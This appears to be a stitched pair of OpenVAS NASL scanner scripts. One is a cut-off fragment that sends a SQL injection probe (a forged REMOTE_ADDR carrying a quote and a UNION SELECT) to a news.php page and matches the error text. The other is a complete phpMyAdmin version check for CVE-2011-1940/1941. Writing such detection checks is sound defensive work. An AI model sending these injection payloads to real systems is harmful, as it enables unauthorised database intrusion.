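dir = m[2];

# Overwrite $_SERVER[REMOTE_ADDR] through the query string (the variable
# overwrite flaw) with a fake address followed by a quote and a harmless
# UNION; a vulnerable install pastes it into SQL and the database reports a
# syntax error.
fake_ip = string(rand() % 255, ".", rand() % 255, ".", rand() % 255);
sql_script = string(fake_ip, ".111", "'/**/UNION+SELECT+", SCRIPT_NAME, "--");
url = string(dir, "/news.php?_SERVER[REMOTE_ADDR]=", sql_script);

req = http_get(port:port, item:url);
received_msg = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
if (isnull(received_msg)) exit(0);

# The expected error text keeps the original's "near '<a.b.c>''" form. The
# prefix is taken directly from fake_ip: the original recovered it with
# strstr(sql_script, ".111"), which cut at the wrong place whenever one of
# the random octets was itself 111.
# NOTE(review): it is not obvious from here why the database would echo only
# the part before ".111"; confirm against a vulnerable install.
filter = string("syntax to use near '", fake_ip, "''");
if (filter >< received_msg)
{
  # risk_factor is "High" and this confirms SQL injection, so report a hole
  # rather than an informational note as the first version did.
  security_hole(port:port);
  set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
  exit(0);
}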

##############################################################################
# OpenVAS Vulnerability Test
# $Id: nopsec_phpbb_2022.nasl 110015 
#2012-06-18 11:43:12 +0100 (Mon, 18 Jun 2012) $
#
# phpMyAdmin version < 3.3.10.1 / 3.4.1 suffers multiple Vulnerabilities
#
# Authors:
# Songhan Yu <[email protected]>
#
# Copyright:
# This script is Copyright NopSec Inc., http://www.nopsec.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

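if (description)
{
  script_id(110015);
  script_version("$Revision: 1.0 $");
  script_cve_id("CVE-2011-1940", "CVE-2011-1941");
  script_bugtraq_id(47945, 47943);

  # script_name was split over two lines by the mail wrap; restored.
  script_name("phpMyAdmin version < 3.3.10.1 / 3.4.1 suffers multiple Vulnerabilities");
  script_summary("Check the version of phpMyAdmin");

  script_description(
"The version of phpMyAdmin earlier than 3.3.10.1 or 3.4.1 suffers from several 
Vulnerabilities. For example, tbl_links.php , url.php and tbl-tracking fails to 
sanitize the input parameters of table and db. THe attacker could make use of 
this to perform injection attacks.
Recommendation:
Upgrade phpMyAdmin to 3.3.10.1 or 3.4.1 or versions after.");

  # Version check only.
  script_category(ACT_GATHER_INFO);
  script_family("Web application abuses");
  script_copyright("This script is Copyright NopSec Inc.");
  # Supplies the "www/<port>/phpMyAdmin" KB entry ("<version> under <dir>").
  script_dependencies("secpod_phpmyadmin_detect_900129.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_keys("phpMyAdmin/installed");
  exit(0);
}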


include("http_func.inc");
include("version_func.inc");

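port = get_http_port(default:80);
if(!get_port_state(port) || !can_host_php(port:port)) exit(0);

pma = get_kb_item("www/" + port + "/phpMyAdmin");
if(isnull(pma)) exit(0);

# KB value is "<version> under <dir>".
m = eregmatch(pattern:"(.*) under (/.*)", string:pma);
if(isnull(m)) exit(0);
current_version = m[1];
if(!current_version) exit(0);

# Fixed in 3.3.10.1 (3.3 branch) and 3.4.1 (3.4 branch). version_in_range()
# is inclusive at both ends, so the original also reported the patched
# releases; the upper bound must be exclusive.
if((version_is_greater_equal(version:current_version, test_version:"3.3") &&
    version_is_less(version:current_version, test_version:"3.3.10.1")) ||
   (version_is_greater_equal(version:current_version, test_version:"3.4") &&
    version_is_less(version:current_version, test_version:"3.4.1")))
{
  security_warning(port:port);
}
exit(0);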











